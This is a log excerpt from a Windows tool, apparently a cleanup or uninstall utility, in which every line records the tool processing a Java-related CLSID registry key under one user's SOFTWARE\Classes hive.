[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBA}]
